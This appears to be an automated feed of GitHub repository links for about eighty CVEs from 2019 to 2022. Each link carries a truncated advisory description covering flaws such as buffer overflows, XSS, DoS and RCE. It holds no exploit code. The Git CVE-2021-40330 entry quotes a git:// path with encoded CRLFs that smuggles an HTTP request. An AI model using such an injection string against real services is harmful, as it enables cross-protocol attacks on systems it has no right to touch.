**A heap-based buffer overflow was discovered in bluetoothd in BlueZ through 5.48. There isn't any check on whether there is enough space in the destination buffer. The function simply appends all data passed to it. The values of all attributes that are requested are appended to the output buffer. There are no size check CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-8922](https://github.com/Live-Hack-CVE/CVE-2019-8922) create time: 2022-12-28T12:55:12Z

**A flaw was found in moodle versions 3.6 to 3.6.1, 3.5 to 3.5.3, 3.4 to 3.4.6, 3.1 to 3.1.15 and earlier unsupported versions. The /userpix/ page did not escape users' full names, which are included as text when hovering over profile images. Note this page is not linked to by default and its access is restricted. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3810](https://github.com/Live-Hack-CVE/CVE-2019-3810) create time: 2022-12-28T12:55:09Z

**It was found that cockpit before version 184 used glib's base64 decode functionality incorrectly resulting in a denial of service attack. An unauthenticated attacker could send a specially crafted request with an invalid base64-encoded cookie which could cause the web service to crash. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3804](https://github.com/Live-Hack-CVE/CVE-2019-3804) create time: 2022-12-28T12:55:05Z

**A vulnerability was found in moodle before versions 3.6.3, 3.5.5 and 3.4.8. Permissions were not correctly checked before loading event information into the calendar's edit event modal popup, so logged in non-guest users could view unauthorised calendar events. (Note: It was read-only access, users could not edit the e CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3848](https://github.com/Live-Hack-CVE/CVE-2019-3848) create time: 2022-12-28T12:54:32Z

**A vulnerability was found in moodle before versions 3.6.3, 3.5.5, 3.4.8 and 3.1.17. Users with the "login as other users" capability (such as administrators/managers) can access other users' Dashboards, but the JavaScript those other users may have added to their Dashboard was not being escaped when being viewed by the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3847](https://github.com/Live-Hack-CVE/CVE-2019-3847) create time: 2022-12-28T12:54:25Z

**A flaw was found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10149](https://github.com/Live-Hack-CVE/CVE-2019-10149) create time: 2022-12-28T12:54:18Z

**WordPress before 5.2.4 has a Server Side Request Forgery (SSRF) vulnerability because Windows paths are mishandled during certain validation of relative URLs. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17670](https://github.com/Live-Hack-CVE/CVE-2019-17670) create time: 2022-12-28T12:54:14Z

**A flaw was found in the yaml.load() function in the osbs-client versions since 0.46 before 0.56.1. Insecure use of the yaml.load() function allowed the user to load any suspicious object for code execution via the parsing of malicious YAML files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10135](https://github.com/Live-Hack-CVE/CVE-2019-10135) create time: 2022-12-28T12:54:01Z

**Postgresql Windows installer before versions 11.5, 10.10, 9.6.15, 9.5.19, 9.4.24 is vulnerable via superuser writing password to unprotected temporary file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10210](https://github.com/Live-Hack-CVE/CVE-2019-10210) create time: 2022-12-28T12:53:57Z

**A flaw was found in the way KVM hypervisor handled x2APIC Machine Specific Rregister (MSR) access with nested(=1) virtualization enabled. In that, L1 guest could access L0's APIC register values via L2 guest, when 'virtualize x2APIC mode' is enabled. A guest could use this flaw to potentially crash the host kernel resu CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3887](https://github.com/Live-Hack-CVE/CVE-2019-3887) create time: 2022-12-28T12:53:54Z

**ansible-playbook -k and ansible cli tools, all versions 2.8.x before 2.8.4, all 2.7.x before 2.7.13 and all 2.6.x before 2.6.19, prompt passwords by expanding them from templates as they could contain special characters. Passwords should be wrapped to prevent templates trigger and exposing them. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10206](https://github.com/Live-Hack-CVE/CVE-2019-10206) create time: 2022-12-28T12:53:46Z

**A flaw was found in all dpdk version 17.x.x before 17.11.8, 16.x.x before 16.11.10, 18.x.x before 18.11.4 and 19.x.x before 19.08.1 where a malicious master, or a container with access to vhost_user socket, can send specially crafted VRING_SET_NUM messages, resulting in a memory leak including file descriptors. This fl CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14818](https://github.com/Live-Hack-CVE/CVE-2019-14818) create time: 2022-12-28T12:53:43Z

**A cleartext password storage issue was discovered in Katello, versions 3.x.x.x before katello 3.12.0.9. Registry credentials used during container image discovery were inadvertently logged without being masked. This flaw could expose the registry credentials to other privileged users. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14825](https://github.com/Live-Hack-CVE/CVE-2019-14825) create time: 2022-12-28T12:52:07Z

**An issue was discovered in MoscaJS Aedes 0.42.0. lib/write.js does not properly consider exceptions during the writing of an invalid packet to a stream. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13410](https://github.com/Live-Hack-CVE/CVE-2020-13410) create time: 2022-12-28T13:02:56Z

**SOPlanning before 1.47 has Incorrect Access Control because certain secret key information, and the related authentication algorithm, is public. The key for admin is hardcoded in the installation code, and there is no key for publicsp (which is a guest account). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13963](https://github.com/Live-Hack-CVE/CVE-2020-13963) create time: 2022-12-28T13:02:52Z

**OpenIAM before 4.2.0.3 does not verify if a user has permissions to perform /webconsole/rest/api/* administrative actions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13422](https://github.com/Live-Hack-CVE/CVE-2020-13422) create time: 2022-12-28T13:02:49Z

**Union Pay up to 1.2.0, for web based versions contains a CWE-347: Improper Verification of Cryptographic Signature vulnerability, allows attackers to shop for free in merchants' websites and mobile apps, via a crafted authentication code (MAC) which is generated based on a secret key which is NULL. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-23533](https://github.com/Live-Hack-CVE/CVE-2020-23533) create time: 2022-12-28T13:02:42Z

**MEDIA NAVI Inc SMACom v1.2 was discovered to contain an insecure session validation vulnerability in the session handling of the `password` authentication parameter of the wifi photo transfer module. This vulnerability allows attackers with network access privileges or on public wifi networks to read the authentication CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-23036](https://github.com/Live-Hack-CVE/CVE-2020-23036) create time: 2022-12-28T13:02:38Z

**TAO Open Source Assessment Platform v3.3.0 RC02 was discovered to contain a HTML injection vulnerability in the userFirstName parameter of the user account input field. This vulnerability allows attackers to execute phishing attacks, external redirects, and arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-23050](https://github.com/Live-Hack-CVE/CVE-2020-23050) create time: 2022-12-28T13:02:35Z

**Incorrect access control in NexusPHP 1.5.beta5.20120707 allows unauthorized attackers to access published content. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-24771](https://github.com/Live-Hack-CVE/CVE-2020-24771) create time: 2022-12-28T12:59:55Z

**CISOfy Lynis before 3.0.0 has Incorrect Access Control because of a TOCTOU race condition. The routine to check the log and report file permissions was not working as intended and could be bypassed locally. Because of the race, an unprivileged attacker can set up a log and report file, and control that up to the point CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13882](https://github.com/Live-Hack-CVE/CVE-2020-13882) create time: 2022-12-28T12:59:51Z

**Tenda AC18 Router through V15.03.05.05_EN and through V15.03.05.19(6318) CN devices could cause a remote code execution due to incorrect authentication handling of vulnerable logincheck() function in /usr/lib/lua/ngx_authserver/ngx_wdas.lua file if the administrator UI Interface is set to "radius". CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-24987](https://github.com/Live-Hack-CVE/CVE-2020-24987) create time: 2022-12-28T12:59:48Z

**Mikrotik RouterOs before stable 6.47 suffers from an uncontrolled resource consumption in the memtest process. An authenticated remote attacker can cause a Denial of Service due to overloading the systems CPU. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-20248](https://github.com/Live-Hack-CVE/CVE-2020-20248) create time: 2022-12-28T12:59:41Z

**Libjpeg-turbo all version have a stack-based buffer overflow in the "transform" component. A remote attacker can send a malformed jpeg file to the service and cause arbitrary code execution or denial of service of the target service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-17541](https://github.com/Live-Hack-CVE/CVE-2020-17541) create time: 2022-12-28T12:59:31Z

**A double free memory issue was found to occur in the libvirt API, in versions before 6.8.0, responsible for requesting information about network interfaces of a running QEMU domain. This flaw affects the polkit access control driver. Specifically, clients connecting to the read-write socket with limited ACL permissions CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25637](https://github.com/Live-Hack-CVE/CVE-2020-25637) create time: 2022-12-28T12:57:19Z

**Directory traversal vulnerability in wkhtmltopdf through 0.12.5 allows remote attackers to read local files and disclose sensitive information via a crafted html file running with the default configurations. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21365](https://github.com/Live-Hack-CVE/CVE-2020-21365) create time: 2022-12-28T12:57:01Z

**A flaw was found in the way samba, as an Active Directory Domain Controller, is able to support an RODC (read-only domain controller). This would allow an RODC to print administrator tickets. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25718](https://github.com/Live-Hack-CVE/CVE-2020-25718) create time: 2022-12-28T12:55:53Z

**The fix for bug CVE-2020-9484 introduced a time of check, time of use vulnerability into Apache Tomcat 10.1.0-M1 to 10.1.0-M8, 10.0.0-M5 to 10.0.14, 9.0.35 to 9.0.56 and 8.5.55 to 8.5.73 that allowed a local attacker to perform actions with the privileges of the user that the Tomcat process is using. This issue is only CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23181](https://github.com/Live-Hack-CVE/CVE-2022-23181) create time: 2022-12-28T12:55:49Z

**A flaw was found in libvirt, where it leaked a file descriptor for `/dev/mapper/control` into the QEMU process. This file descriptor allows for privileged operations to happen against the device-mapper on the host. This flaw allows a malicious guest user or process to perform operations outside of their standard permis CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14339](https://github.com/Live-Hack-CVE/CVE-2020-14339) create time: 2022-12-28T12:55:32Z

**An integer underflow in dpdk versions before 18.11.10 and before 19.11.5 in the `move_desc` function can lead to large amounts of CPU cycles being eaten up in a long running loop. An attacker could cause `move_desc` to get stuck in a 4,294,967,295-count iteration loop. Depending on how `vhost_crypto` is being used this CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14378](https://github.com/Live-Hack-CVE/CVE-2020-14378) create time: 2022-12-28T12:53:36Z

**An incorrect access control flaw was found in the operator, openshift-service-mesh/istio-rhel8-operator all versions through 1.1.3. This flaw allows an attacker with a basic level of access to the cluster to deploy a custom gateway/pod to any namespace, potentially gaining access to privileged service account tokens. T CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14306](https://github.com/Live-Hack-CVE/CVE-2020-14306) create time: 2022-12-28T12:53:33Z

**A memory leak flaw was found in WildFly OpenSSL in versions prior to 1.1.3.Final, where it removes an HTTP session. It may allow the attacker to cause OOM leading to a denial of service. The highest threat from this vulnerability is to system availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25644](https://github.com/Live-Hack-CVE/CVE-2020-25644) create time: 2022-12-28T12:53:03Z

**A memory leak flaw was found in WildFly in all versions up to 21.0.0.Final, where host-controller tries to reconnect in a loop, generating new connections which are not properly closed while not able to connect to domain-controller. This flaw allows an attacker to cause an Out of memory (OOM) issue, leading to a denial CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25689](https://github.com/Live-Hack-CVE/CVE-2020-25689) create time: 2022-12-28T12:52:59Z

**In moodle, insufficient capability checks could lead to users with the ability to course restore adding additional capabilities to roles within that course. Versions affected: 3.9 to 3.9.2, 3.8 to 3.8.5, 3.7 to 3.7.8, 3.5 to 3.5.14 and earlier unsupported versions. This is fixed in moodle 3.9.3, 3.8.6, 3.7.9, 3.5.15, a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25699](https://github.com/Live-Hack-CVE/CVE-2020-25699) create time: 2022-12-28T12:52:56Z

**An information disclosure vulnerability was found in containers/podman in versions before 2.0.5. When using the deprecated Varlink API or the Docker-compatible REST API, if multiple containers are created in a short duration, the environment variables from the first container will get leaked into subsequent containers. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14370](https://github.com/Live-Hack-CVE/CVE-2020-14370) create time: 2022-12-28T12:52:52Z

**A flaw was found in the Linux Kernel before 5.8-rc6 in the ZRAM kernel module, where a user with a local account and the ability to read the /sys/class/zram-control/hot_add file can create ZRAM device nodes in the /dev/ directory. This read allocates kernel memory and is not accounted for a user that triggers the creat CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10781](https://github.com/Live-Hack-CVE/CVE-2020-10781) create time: 2022-12-28T12:52:48Z

**The Rating by BestWebSoft WordPress plugin before 1.6 does not validate the submitted rating, allowing submission of long integer, causing a Denial of Service on the post/page when a user submit such rating CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25121](https://github.com/Live-Hack-CVE/CVE-2021-25121) create time: 2022-12-28T13:01:25Z

**Saibamen HotelManager v1.2 is vulnerable to Cross Site Scripting (XSS) due to improper sanitization of comment and contact fields. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39473](https://github.com/Live-Hack-CVE/CVE-2021-39473) create time: 2022-12-28T13:00:26Z

**diplib v3.0.0 is vulnerable to Double Free. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39432](https://github.com/Live-Hack-CVE/CVE-2021-39432) create time: 2022-12-28T12:59:58Z

**Mikrotik RouterOs before 6.47 (stable tree) suffers from an uncontrolled resource consumption vulnerability in the /nova/bin/route process. An authenticated remote attacker can cause a Denial of Service due to overloading the systems CPU. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-20217](https://github.com/Live-Hack-CVE/CVE-2020-20217) create time: 2022-12-28T12:59:38Z

**Mikrotik RouterOs 6.44.5 (long-term tree) suffers from an stack exhaustion vulnerability in the /nova/bin/net process. An authenticated remote attacker can cause a Denial of Service due to overloading the systems CPU. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-20213](https://github.com/Live-Hack-CVE/CVE-2020-20213) create time: 2022-12-28T12:59:34Z

**library/std/src/net/parser.rs in Rust before 1.53.0 does not properly consider extraneous zero characters at the beginning of an IP address string, which (in some situations) allows attackers to bypass access control that is based on IP addresses, because of unexpected octal interpretation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-29922](https://github.com/Live-Hack-CVE/CVE-2021-29922) create time: 2022-12-28T12:58:43Z

**The WP Fluent Forms plugin < 3.6.67 for WordPress is vulnerable to Cross-Site Request Forgery leading to stored Cross-Site Scripting and limited Privilege Escalation due to a missing nonce check in the access control function for administrative AJAX actions CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34620](https://github.com/Live-Hack-CVE/CVE-2021-34620) create time: 2022-12-28T12:58:36Z

**jQuery-UI is the official jQuery user interface library. Prior to version 1.13.0, accepting the value of various `*Text` options of the Datepicker widget from untrusted sources may execute untrusted code. The issue is fixed in jQuery UI 1.13.0. The values passed to various `*Text` options are now always treated as pure CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41183](https://github.com/Live-Hack-CVE/CVE-2021-41183) create time: 2022-12-28T12:58:32Z

**An issue was discovered in gatt-database.c in BlueZ 5.61. A use-after-free can occur when a client disconnects during D-Bus processing of a WriteValue call. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43400](https://github.com/Live-Hack-CVE/CVE-2021-43400) create time: 2022-12-28T12:57:53Z

**jQuery-UI is the official jQuery user interface library. Prior to version 1.13.0, accepting the value of the `of` option of the `.position()` util from untrusted sources may execute untrusted code. The issue is fixed in jQuery UI 1.13.0. Any string value passed to the `of` option is now treated as a CSS selector. A wor CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41184](https://github.com/Live-Hack-CVE/CVE-2021-41184) create time: 2022-12-28T12:57:39Z

**jQuery-UI is the official jQuery user interface library. Prior to version 1.13.0, accepting the value of the `altField` option of the Datepicker widget from untrusted sources may execute untrusted code. The issue is fixed in jQuery UI 1.13.0. Any string value passed to the `altField` option is now treated as a CSS sele CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41182](https://github.com/Live-Hack-CVE/CVE-2021-41182) create time: 2022-12-28T12:57:33Z

**BlueZ is a Bluetooth protocol stack for Linux. In affected versions a vulnerability exists in sdp_cstate_alloc_buf which allocates memory which will always be hung in the singly linked list of cstates and will not be freed. This will cause a memory leak over time. The data can be a very large object, which can be cause CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41229](https://github.com/Live-Hack-CVE/CVE-2021-41229) create time: 2022-12-28T12:57:29Z

**Adobe Lightroom Classic 10.3 (and earlier) are affected by a privilege escalation vulnerability in the Offline Lightroom Classic installer. An authenticated attacker could leverage this vulnerability to escalate privileges. User interaction is required before product installation to abuse this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40776](https://github.com/Live-Hack-CVE/CVE-2021-40776) create time: 2022-12-28T12:56:50Z

**If the Node.js https API was used incorrectly and "undefined" was in passed for the "rejectUnauthorized" parameter, no error was returned and connections to servers with an expired certificate would have been accepted. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22939](https://github.com/Live-Hack-CVE/CVE-2021-22939) create time: 2022-12-28T12:56:43Z

**git_connect_git in connect.c in Git before 2.30.1 allows a repository path to contain a newline character, which may result in unexpected cross-protocol requests, as demonstrated by the git://localhost:1234/%0d%0a%0d%0aGET%20/%20HTTP/1.1 substring. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40330](https://github.com/Live-Hack-CVE/CVE-2021-40330) create time: 2022-12-28T12:56:07Z

**ansi-regex is vulnerable to Inefficient Regular Expression Complexity CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3807](https://github.com/Live-Hack-CVE/CVE-2021-3807) create time: 2022-12-28T12:55:59Z

**A buffer overflow vulnerability in CDataList of the jwwlib component of LibreCAD 2.2.0-rc3 and older allows an attacker to achieve Remote Code Execution using a crafted JWW document. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45342](https://github.com/Live-Hack-CVE/CVE-2021-45342) create time: 2022-12-28T12:55:56Z

**The redirect URI in the LTI authorization endpoint required extra sanitizing to prevent reflected XSS and open redirect risks. Moodle versions 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8 and earlier unsupported versions are affected. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32478](https://github.com/Live-Hack-CVE/CVE-2021-32478) create time: 2022-12-28T12:55:46Z

**In LibreCAD 2.2.0, a NULL pointer dereference in the HATCH handling of libdxfrw allows an attacker to crash the application using a crafted DXF document. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45343](https://github.com/Live-Hack-CVE/CVE-2021-45343) create time: 2022-12-28T12:55:43Z

**Dell EMC Avamar versions 18.2,19.1,19.2,19.3,19.4 contain a plain-text password storage vulnerability. A high privileged user could potentially exploit this vulnerability, leading to a complete outage. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36318](https://github.com/Live-Hack-CVE/CVE-2021-36318) create time: 2022-12-28T12:55:26Z

**Dell EMC Avamar Server version 19.4 contains a plain-text password storage vulnerability in AvInstaller. A local attacker could potentially exploit this vulnerability, leading to the disclosure of certain user credentials. The attacker may be able to use the exposed credentials to access the vulnerable application with CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36317](https://github.com/Live-Hack-CVE/CVE-2021-36317) create time: 2022-12-28T12:55:23Z

**A heap-based buffer overflow flaw was found in the Linux kernel FireDTV media card driver, where the user calls the CA_SEND_MSG ioctl. This flaw allows a local user of the host machine to crash the system or escalate privileges on the system. The highest threat from this vulnerability is to confidentiality, integrity, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42739](https://github.com/Live-Hack-CVE/CVE-2021-42739) create time: 2022-12-28T12:55:02Z

**A flaw was found in Undertow. A potential security issue in flow control handling by the browser over HTTP/2 may cause overhead or a denial of service in the server. This flaw exists because of an incomplete fix for CVE-2021-3629. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1259](https://github.com/Live-Hack-CVE/CVE-2022-1259) create time: 2022-12-28T12:54:54Z

**MariaDB Server before 10.7 is vulnerable to Denial of Service. In extra/mariabackup/ds_xbstream.cc, when an error occurs (stream_ctxt->dest_file == NULL) while executing the method xbstream_open, the held lock is not released correctly, which allows local users to trigger a denial of service due to the deadlock. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31621](https://github.com/Live-Hack-CVE/CVE-2022-31621) create time: 2022-12-28T13:03:20Z

**MariaDB Server before 10.7 is vulnerable to Denial of Service. While executing the plugin/server_audit/server_audit.c method log_statement_ex, the held lock lock_bigbuffer is not released correctly, which allows local users to trigger a denial of service due to the deadlock. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31624](https://github.com/Live-Hack-CVE/CVE-2022-31624) create time: 2022-12-28T13:03:17Z

**MariaDB Server before 10.7 is vulnerable to Denial of Service. In extra/mariabackup/ds_compress.cc, when an error occurs (pthread_create returns a nonzero value) while executing the method create_worker_threads, the held lock is not released correctly, which allows local users to trigger a denial of service due to the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31622](https://github.com/Live-Hack-CVE/CVE-2022-31622) create time: 2022-12-28T13:03:14Z

**A CWE-347: Improper Verification of Cryptographic Signature vulnerability exists that allows adversaries with local user privileges to load a malicious DLL which could lead to execution of malicious code. Affected Products: EcoStruxure Operator Terminal Expert(V3.3 Hotfix 1 or prior), Pro-face BLUE(V3.3 Hotfix1 or prio CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41666](https://github.com/Live-Hack-CVE/CVE-2022-41666) create time: 2022-12-28T13:03:10Z

**A CWE-704: Incorrect Project Conversion vulnerability exists that allows adversaries with local user privileges to load a project file from an adversary-controlled network share which could result in execution of malicious code. Affected Products: EcoStruxure Operator Terminal Expert(V3.3 Hotfix 1 or prior), Pro-face B CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41668](https://github.com/Live-Hack-CVE/CVE-2022-41668) create time: 2022-12-28T13:03:07Z

**A CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability exists that allows adversaries with local user privileges to load a malicious DLL which could lead to execution of malicious code. Affected Products: EcoStruxure Operator Terminal Expert(V3.3 Hotfix 1 or prior), Pro-f CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41667](https://github.com/Live-Hack-CVE/CVE-2022-41667) create time: 2022-12-28T13:03:03Z

**Use of Externally-Controlled Format String in GitHub repository pingcap/tidb prior to 6.4.0, 6.1.3. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3023](https://github.com/Live-Hack-CVE/CVE-2022-3023) create time: 2022-12-28T13:02:59Z

**Code Injection in GitHub repository froxlor/froxlor prior to 0.10.39. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3721](https://github.com/Live-Hack-CVE/CVE-2022-3721) create time: 2022-12-28T13:02:45Z

**In Jenkins 2.320 through 2.355 (both inclusive) and LTS 2.332.1 through LTS 2.332.3 (both inclusive) the help icon does not escape the feature name that is part of its tooltip, effectively undoing the fix for SECURITY-1955, resulting in a cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Config CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34170](https://github.com/Live-Hack-CVE/CVE-2022-34170) create time: 2022-12-28T13:02:20Z

**In Jenkins 2.321 through 2.355 (both inclusive) and LTS 2.332.1 through LTS 2.332.3 (both inclusive) the HTML output generated for new symbol-based SVG icons includes the 'title' attribute of 'l:ionicon' (until Jenkins 2.334) and 'alt' attribute of 'l:icon' (since Jenkins 2.335) without further escaping, resulting in a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34171](https://github.com/Live-Hack-CVE/CVE-2022-34171) create time: 2022-12-28T13:02:13Z

**In Jenkins 2.340 through 2.355 (both inclusive) the tooltip of the build button in list views supports HTML without escaping the job display name, resulting in a cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34173](https://github.com/Live-Hack-CVE/CVE-2022-34173) create time: 2022-12-28T13:02:09Z

**In Jenkins 2.340 through 2.355 (both inclusive) symbol-based icons unescape previously escaped values of 'tooltip' parameters, resulting in a cross-site scripting (XSS) vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34172](https://github.com/Live-Hack-CVE/CVE-2022-34172) create time: 2022-12-28T13:01:42Z

**The Awin Data Feed WordPress plugin before 1.8 does not sanitise and escape a header when processing request to generate analytics data, allowing unauthenticated users to perform Stored Cross-Site Scripting attacks against a logged in admin viewing the plugin's settings CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1938](https://github.com/Live-Hack-CVE/CVE-2022-1938) create time: 2022-12-28T13:01:39Z

**The Awin Data Feed WordPress plugin before 1.8 does not sanitise and escape a parameter before outputting it back via an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1937](https://github.com/Live-Hack-CVE/CVE-2022-1937) create time: 2022-12-28T13:01:35Z

**drivers/block/floppy.c in the Linux kernel before 5.17.6 is vulnerable to a denial of service, because of a concurrency use-after-free flaw after deallocating raw_cmd in the raw_cmd_ioctl function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33981](https://github.com/Live-Hack-CVE/CVE-2022-33981) create time: 2022-12-28T13:01:29Z

**iSpy v7.2.2.0 is vulnerable to remote command execution via path traversal. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29774](https://github.com/Live-Hack-CVE/CVE-2022-29774) create time: 2022-12-28T13:01:22Z

**The administration interface of the Raytion Custom Security Manager (Raytion CSM) in Version 7.2.0 allows reflected Cross-site Scripting (XSS). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29931](https://github.com/Live-Hack-CVE/CVE-2022-29931) create time: 2022-12-28T13:01:18Z

**relay_cgi.cgi on Dingtian DT-R002 2CH relay devices with firmware 3.1.276A allows an attacker to replay HTTP post requests without the need for authentication or a valid signed/authorized request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29593](https://github.com/Live-Hack-CVE/CVE-2022-29593) create time: 2022-12-28T13:01:14Z

**Zoho ManageEngine Password Manager Pro before 12101 and PAM360 before 5510 are vulnerable to unauthenticated remote code execution. (This also affects ManageEngine Access Manager Plus before 4303 with authentication.) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35405](https://github.com/Live-Hack-CVE/CVE-2022-35405) create time: 2022-12-28T13:01:11Z

**UltraJSON is a fast JSON encoder and decoder written in pure C with bindings for Python 3.7+. In versions prior to 5.4.0 an error occurring while reallocating a buffer for string decoding can cause the buffer to get freed twice. Due to how UltraJSON uses the internal decoder, this double free is impossible to trigger f CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31117](https://github.com/Live-Hack-CVE/CVE-2022-31117) create time: 2022-12-28T13:01:07Z

**rpc.py through 0.6.0 allows Remote Code Execution because an unpickle occurs when the "serializer: pickle" HTTP header is sent. In other words, although JSON (not Pickle) is the default data format, an unauthenticated client can cause the data to be processed with unpickle. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35411](https://github.com/Live-Hack-CVE/CVE-2022-35411) create time: 2022-12-28T13:01:04Z

**Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. Versions prior to 6.1.1.0 are subject to a remote code execution vulnerability. System commands can be run remotely via the subprocess_execute function without processing the inputs received from the user in the /app/options.py file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31137](https://github.com/Live-Hack-CVE/CVE-2022-31137) create time: 2022-12-28T13:01:00Z

**An issue in the component luaG_runerror of Lua v5.4.4 and below leads to a heap-buffer overflow when a recursive error occurs. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33099](https://github.com/Live-Hack-CVE/CVE-2022-33099) create time: 2022-12-28T13:00:57Z

**The Import any XML or CSV File to WordPress plugin before 3.6.8 accepts all zip files and automatically extracts the zip file without validating the extracted file type. Allowing high privilege users such as admin to upload an arbitrary file like PHP, leading to RCE CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2268](https://github.com/Live-Hack-CVE/CVE-2022-2268) create time: 2022-12-28T13:00:53Z

**network backend may cause Linux netfront to use freed SKBs While adding logic to support XDP (eXpress Data Path), a code label was moved in a way allowing for SKBs having references (pointers) retained for further processing to nevertheless be freed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33743](https://github.com/Live-Hack-CVE/CVE-2022-33743) create time: 2022-12-28T13:00:50Z

**UltraJSON is a fast JSON encoder and decoder written in pure C with bindings for Python 3.7+. Affected versions were found to improperly decode certain characters. JSON strings that contain escaped surrogate characters not part of a proper surrogate pair were decoded incorrectly. Besides corrupting strings, this allowe CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31116](https://github.com/Live-Hack-CVE/CVE-2022-31116) create time: 2022-12-28T13:00:47Z

